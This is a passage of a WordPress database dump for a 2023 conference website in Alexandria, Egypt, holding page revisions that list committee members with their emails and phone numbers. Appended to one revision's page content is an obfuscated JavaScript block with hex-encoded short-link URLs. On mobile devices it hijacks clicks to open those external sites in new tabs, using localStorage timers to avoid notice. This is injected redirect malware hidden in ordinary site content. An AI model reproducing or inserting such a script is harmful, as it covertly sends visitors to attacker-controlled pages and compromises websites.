el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">Local Web director<br />\r\nGSW2023, Egypt<br />\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\r\nDirector of Events and conferences Department<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\r\nLocal financial Director, GSW2023, Egypt<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:42:50','2023-06-28 09:42:50','',4849,'https://gsw2023.com/?p=4957',0,'revision','',0),
(4958,4,'2023-06-28 09:55:41','2023-06-28 09:55:41','','remote_sensing_logo','','inherit','open','closed','','remote_sensing_logo','','','2023-06-28 09:55:41','2023-06-28 09:55:41','',0,'https://gsw2023.com/wp-content/uploads/2023/06/remote_sensing_logo.jpeg',0,'attachment','image/jpeg',0),
(4959,4,'2023-06-28 10:07:18','2023-06-28 10:07:18','','remote_sensing_logo','','inherit','open','closed','','remote_sensing_logo-2','','','2023-06-28 10:07:18','2023-06-28 10:07:18','',0,'https://gsw2023.com/wp-content/uploads/2023/06/remote_sensing_logo.png',0,'attachment','image/png',0),
(4960,4,'2023-06-28 10:20:27','2023-06-28 10:20:27','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\r\nVice President for Post Graduate and Scientific Research<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">Local Web director<br />\r\nGSW2023, Egypt<br />\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px 